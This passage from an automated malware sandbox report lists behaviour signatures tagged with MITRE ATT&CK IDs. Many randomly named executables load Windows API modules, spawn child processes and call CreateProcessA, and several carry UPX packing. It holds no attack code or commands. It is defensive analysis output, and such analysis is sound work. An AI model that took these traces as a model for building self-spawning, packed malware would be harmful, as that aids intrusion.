\"brftth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003860)\n \"2644808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004556)\n \"2644808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004556)\n \"2644808.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004556)\n \"2644808.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004556)\n \"rxbdpdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001132)\n \"rxbdpdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001132)\n \"rxbdpdj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001132)\n \"rxbdpdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001132)\n \"jdfnf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003248)\n \"jdfnf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003248)\n \"jdfnf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003248)\n \"jdfnf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003248)\n \"dtrvhhj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001876)\n \"dtrvhhj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001876)\n \"dtrvhhj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001876)\n \"dtrvhhj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001876)\n \"xlfdrhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004100)\n \"xlfdrhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004100)\n \"xlfdrhv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004100)\n \"xlfdrhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004100)\n \"jjjvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003712)\n \"jjjvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003712)\n \"jjjvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003712)\n \"jjjvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003712)\n \"vnvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000892)\n \"vnvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000892)\n \"vnvdx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000892)\n \"vnvdx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000892)\n \"pxxhpb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000864)\n \"pxxhpb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000864)\n \"pxxhpb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000864)\n \"pxxhpb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000864)\n \"4828644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001436)\n \"4828644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001436)\n \"4828644.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001436)\n \"4828644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001436)\n \"6680468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004004)\n \"6680468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004004)\n \"6680468.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004004)\n \"6680468.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004004)\n \"80426.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004088)\n \"80426.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004088)\n \"80426.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004088)\n \"80426.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004088)\n \"nhppdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003456)\n \"nhppdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003456)\n \"nhppdj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003456)\n \"nhppdj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003456)\n \"28408.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004604)\n \"28408.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004604)\n \"28408.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004604)\n \"28408.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004604)\n \"40664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000796)\n \"40664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000796)\n \"40664.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000796)\n \"40664.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000796)\n \"bprdtlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003668)\n \"bprdtlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003668)\n \"bprdtlh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003668)\n \"bprdtlh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003668)\n \"pbpbdlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003928)\n \"pbpbdlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003928)\n \"pbpbdlp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003928)\n \"pbpbdlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003928)\n \"xbrvntf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003432)\n \"xbrvntf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003432)\n \"xbrvntf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003432)\n \"xbrvntf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003432)\n \"fvxvdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003776)\n \"fvxvdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003776)\n \"fvxvdn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003776)\n \"fvxvdn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003776)\n \"llxxlrt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004612)\n \"llxxlrt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004612)\n \"llxxlrt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004612)\n \"llxxlrt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004612)\n \"dfddlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004400)\n \"dfddlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004400)\n \"dfddlr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004400)\n \"dfddlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004400)\n \"0806084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004808)\n \"0806084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004808)\n \"0806084.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004808)\n \"0806084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004808)\n \"66842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002792)\n \"66842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002792)\n \"66842.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002792)\n \"66842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002792)\n \"02486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003364)\n \"02486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003364)\n \"02486.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003364)\n \"02486.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003364)\n \"824246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002704)\n \"824246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002704)\n \"824246.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002704)\n \"824246.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002704)\n \"xfvdbnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004716)\n \"xfvdbnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004716)\n \"xfvdbnh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004716)\n \"xfvdbnh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004716)\n \"pfrdl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002160)\n \"pfrdl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002160)\n \"pfrdl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002160)\n \"pfrdl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002160)\n \"xtrhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001216)\n \"xtrhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001216)\n \"xtrhlt.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001216)\n \"xtrhlt.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001216)\n \"drppx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003896)\n \"drppx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003896)\n \"drppx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003896)\n \"drppx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003896)\n \"2406002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004812)\n \"2406002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004812)\n \"2406002.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004812)\n \"2406002.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004812)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"lpdvdhr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lpdvdhr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nrtffvl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nrtffvl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"llxjdlf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"llxjdlf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xhbff.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xhbff.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"brftth.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"brftth.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2644808.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2644808.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rxbdpdj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rxbdpdj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jdfnf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jdfnf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dtrvhhj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dtrvhhj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xlfdrhv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xlfdrhv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jjjvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jjjvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vnvdx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vnvdx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pxxhpb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pxxhpb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4828644.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4828644.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6680468.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6680468.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"80426.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"80426.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nhppdj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nhppdj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"28408.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"28408.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"40664.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"40664.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bprdtlh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bprdtlh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pbpbdlp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pbpbdlp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xbrvntf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xbrvntf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fvxvdn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fvxvdn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"llxxlrt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"llxxlrt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dfddlr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dfddlr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0806084.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0806084.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66842.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66842.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02486.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02486.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"824246.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"824246.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xfvdbnh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xfvdbnh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pfrdl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pfrdl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xtrhlt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xtrhlt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"drppx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"drppx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2406002.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2406002.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"lpdvdhr.exe\" (UID: 00000000-00004544)\n Spawned process \"nrtffvl.exe\" (UID: 00000000-00005960)\n Spawned process \"npltvpp.exe\" (UID: 00000000-00002192)\n Spawned process \"llxjdlf.exe\" (UID: 00000000-00003448)\n Spawned process \"rxrfxtr.exe\" (UID: 00000000-00003228)\n Spawned process \"xhbff.exe\" (UID: 00000000-00003612)\n Spawned process \"vhppv.exe\" (UID: 00000000-00003168)\n Spawned process \"hfbrlh.exe\" (UID: 00000000-00003468)\n Spawned process \"brftth.exe\" (UID: 00000000-00003860)\n Spawned process \"2644808.exe\" (UID: 00000000-00004556)\n Spawned process \"vjvxf.exe\" (UID: 00000000-00002708)\n Spawned process \"rxbdpdj.exe\" (UID: 00000000-00001132)\n Spawned process \"jdfnf.exe\" (UID: 00000000-00003248)\n Spawned process \"llpbnv.exe\" (UID: 00000000-00003220)\n Spawned process \"dtrvhhj.exe\" (UID: 00000000-00001876)\n Spawned process \"lxdlb.exe\" (UID: 00000000-00003720)\n Spawned process \"fplntnd.exe\" (UID: 00000000-00001284)\n Spawned process \"xlfdrhv.exe\" (UID: 00000000-00004100)\n Spawned process \"nhjtnrr.exe\" (UID: 00000000-00003728)\n Spawned process \"4868486.exe\" (UID: 00000000-00003920)\n Spawned process \"42020.exe\" (UID: 00000000-00004244)\n Spawned process \"jjjvj.exe\" (UID: 00000000-00003712)\n Spawned process \"tljxh.exe\" (UID: 00000000-00001856)\n Spawned process \"vnvdx.exe\" (UID: 00000000-00000892)\n Spawned process \"pxxhpb.exe\" (UID: 00000000-00000864)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"lpdvdhr.exe\" (UID: 00000000-00004544)\n Spawned process \"nrtffvl.exe\" (UID: 00000000-00005960)\n Spawned process \"npltvpp.exe\" (UID: 00000000-00002192)\n Spawned process \"llxjdlf.exe\" (UID: 00000000-00003448)\n Spawned process \"rxrfxtr.exe\" (UID: 00000000-00003228)\n Spawned process \"xhbff.exe\" (UID: 00000000-00003612)\n Spawned process \"vhppv.exe\" (UID: 00000000-00003168)\n Spawned process \"hfbrlh.exe\" (UID: 00000000-00003468)\n Spawned process \"brftth.exe\" (UID: 00000000-00003860)\n Spawned process \"2644808.exe\" (UID: 00000000-00004556)\n Spawned process \"vjvxf.exe\" (UID: 00000000-00002708)\n Spawned process \"rxbdpdj.exe\" (UID: 00000000-00001132)\n Spawned process \"jdfnf.exe\" (UID: 00000000-00003248)\n Spawned process \"llpbnv.exe\" (UID: 00000000-00003220)\n Spawned process \"dtrvhhj.exe\" (UID: 00000000-00001876)\n Spawned process \"lxdlb.exe\" (UID: 00000000-00003720)\n Spawned process \"fplntnd.exe\" (UID: 00000000-00001284)\n Spawned process \"xlfdrhv.exe\" (UID: 00000000-00004100)\n Spawned process \"nhjtnrr.exe\" (UID: 00000000-00003728)\n Spawned process \"4868486.exe\" (UID: 00000000-00003920)\n Spawned process \"42020.exe\" (UID: 00000000-00004244)\n Spawned process \"jjjvj.exe\" (UID: 00000000-00003712)\n Spawned process \"tljxh.exe\" (UID: 00000000-00001856)\n Spawned process \"vnvdx.exe\" (UID: 00000000-00000892)\n Spawned process \"pxxhpb.exe\" (UID: 00000000-00000864)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" was detected as \"UPX\" and name: \"Packer\"\n \"4644224.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"62424.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"20082.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xxvjvfv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rpfxpvf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"66262.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"6820002.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"020066.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fjjxl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"82488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"04226.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"240402.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2406002.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"drppx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xtrhlt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pfrdl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xfvdbnh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"blvvjn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"fvbpf.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ntpjj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"644880.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"824246.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"02486.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"66842.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f40a76@RPCRT4.dll\"\n \"15001600c03e5a6b@ADVAPI32.dll\"\n \"0e000f00703f5a6b@ADVAPI32.dll\"\n \"0e000f00cc3f5a6b@ADVAPI32.dll\"\n \"11001200b4475a6b@ADVAPI32.dll\"\n \"1100120048485a6b@ADVAPI32.dll\"\n \"120013008c485a6b@ADVAPI32.dll\"\n \"12001300e4485a6b@ADVAPI32.dll\"\n \"14001500386e5a6b@ADVAPI32.dll\"\n \"14001500506e5a6b@ADVAPI32.dll\"\n \"14001500686e5a6b@ADVAPI32.dll\"\n \"17001800806e5a6b@ADVAPI32.dll\"\n \"0d000e00986e5a6b@ADVAPI32.dll\"\n \"11001200a86e5a6b@ADVAPI32.dll\"\n \"11001200bc6e5a6b@ADVAPI32.dll\"\n \"0f001000fc6f5a6b@ADVAPI32.dll\"\n \"140015003c705a6b@ADVAPI32.dll\"\n \"1400150054705a6b@ADVAPI32.dll\"\n \"0c000d009c705a6b@ADVAPI32.dll\"\n \"0c000d00ac705a6b@ADVAPI32.dll\"\n \"0e000f00bc705a6b@ADVAPI32.dll\"\n \"0e000f00cc705a6b@ADVAPI32.dll\"\n \"0b000c00dc705a6b@ADVAPI32.dll\"\n \"1800190014735a6b@RPCRT4.dll\"\n \"1300140040735a6b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"nrtffvl.exe\" called \"CreateProcessA\" with parameter \"c:\\npltvpp.exe\" - (UID: 00000000-00005960)\n \"xhbff.exe\" called \"CreateProcessA\" with parameter \"c:\\vhppv.exe\" - (UID: 00000000-00003612)\n \"vpvxpp.exe\" 